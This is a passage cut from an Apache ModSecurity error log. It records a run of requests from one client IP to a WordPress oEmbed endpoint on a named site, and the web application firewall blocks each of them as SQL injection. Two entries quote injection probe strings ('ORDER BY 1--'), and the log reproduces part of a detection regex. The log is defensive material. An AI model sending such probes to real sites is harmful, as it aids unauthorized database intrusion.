"/wp-json/oembed/1.0/embed"] [unique_id "Zr27JXxeJlWfH1pdny5XlwAAAMU"] [Thu Aug 15 03:24:06.404999 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:57242] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27JnxeJlWfH1pdny5XmAAAAMg"] [Thu Aug 15 03:24:06.789118 2024] [:error] [pid 31519:tid 139653822744320] [client 141.98.81.52:57246] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27JnxeJlWfH1pdny5XmgAAANU"] [Thu Aug 15 03:24:07.250421 2024] [:error] [pid 31519:tid 139653814351616] [client 141.98.81.52:57250] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27J3xeJlWfH1pdny5XmwAAANY"] [Thu Aug 15 03:24:07.619359 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:57252] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27J3xeJlWfH1pdny5XnAAAAM0"] [Thu Aug 15 03:24:08.011694 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:57254] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27KHxeJlWfH1pdny5XnQAAAME"] [Thu Aug 15 03:24:08.503170 2024] [:error] [pid 31336:tid 139653931849472] [client 141.98.81.52:57260] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27KEPAyXqJhbW53WyPagAAAEg"] [Thu Aug 15 03:24:09.100630 2024] [:error] [pid 31337:tid 139654058071808] [client 141.98.81.52:57264] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27KewCyyCVFXh0DMS2rQAAAIE"] [Thu Aug 15 03:24:09.385242 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:57266] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27KXxeJlWfH1pdny5XoAAAANc"] [Thu Aug 15 03:24:09.861626 2024] [:error] [pid 31336:tid 139653923456768] [client 141.98.81.52:57268] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27KUPAyXqJhbW53WyPawAAAEk"] [Thu Aug 15 03:24:10.285253 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:57270] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml' ORDER BY 1-- dbCo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27KnxeJlWfH1pdny5XoQAAANI"] [Thu Aug 15 03:24:10.709039 2024] [:error] [pid 31519:tid 139653856315136] [client 141.98.81.52:57272] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27KnxeJlWfH1pdny5XogAAANE"] [Thu Aug 15 03:24:11.123427 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:57274] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27K3xeJlWfH1pdny5XowAAAMA"] [Thu Aug 15 03:24:11.557116 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:57276] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27K3xeJlWfH1pdny5XpAAAAMU"] [Thu Aug 15 03:24:12.001578 2024] [:error] [pid 31335:tid 139654032893696] [client 141.98.81.52:57278] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27K20MD5oChETZltkVbAAAAAQ"] [Thu Aug 15 03:24:12.405375 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:57280] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27LHxeJlWfH1pdny5XpQAAAMg"] [Thu Aug 15 03:24:13.000577 2024] [:error] [pid 31519:tid 139653873100544] [client 141.98.81.52:57282] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27LHxeJlWfH1pdny5XpgAAAM8"] [Thu Aug 15 03:24:13.389922 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:57284] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27LXxeJlWfH1pdny5XpwAAANg"] [Thu Aug 15 03:24:13.933873 2024] [:error] [pid 31336:tid 139653864707840] [client 141.98.81.52:57286] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27LUPAyXqJhbW53WyPbAAAAFA"] [Thu Aug 15 03:24:14.326165 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:57288] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27LnxeJlWfH1pdny5XqAAAAMY"] [Thu Aug 15 03:24:14.794327 2024] [:error] [pid 31519:tid 139653831137024] [client 141.98.81.52:57290] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27LnxeJlWfH1pdny5XqQAAANQ"] [Thu Aug 15 03:24:15.269292 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:57292] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml%' ORDER BY 1-- TRau"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27L3xeJlWfH1pdny5XqgAAAMk"] [Thu Aug 15 03:24:15.743752 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:57294] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27L3xeJlWfH1pdny5XqwAAAME"] [Thu Aug 15 03:24:16.200632 2024] [:error] [pid 31336:tid 139653856315136] [client 141.98.81.52:57296] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27MEPAyXqJhbW53WyPbQAAAFE"] [Thu Aug 15 03:24:16.614029 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:57300] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27MHxeJlWfH1pdny5XrAAAAMM"] [Thu Aug 15 03:24:17.106609 2024] [:error] [pid 31337:tid 139654066464512] [client 141.98.81.52:57302] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27MewCyyCVFXh0DMS2rgAAAIA"] [Thu Aug 15 03:24:17.491438 2024] [:error] [pid 31337:tid 139653831137024] [client 141.98.81.52:57304] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27MewCyyCVFXh0DMS2rwAAAJQ"] [Thu Aug 15 03:24:17.936831 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:57306] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27MXxeJlWfH1pdny5XrQAAANc"] [Thu Aug 15 03:24:18.414454 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:57308] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27MnxeJlWfH1pdny5XrgAAAMs"] [Thu Aug 15 03:24:18.788445 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:57310] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27MnxeJlWfH1pdny5XrwAAANI"] [Thu Aug 15 03:24:19.273659 2024] [:error] [pid 31519:tid 139653856315136] [client 141.98.81.52:57312] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27M3xeJlWfH1pdny5XsAAAANE"] [Thu Aug 15 03:24:19.706676 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:57314] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27M3xeJlWfH1pdny5XsQAAAMA"] [Thu Aug 15 03:24:20.092641 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:57316] [client 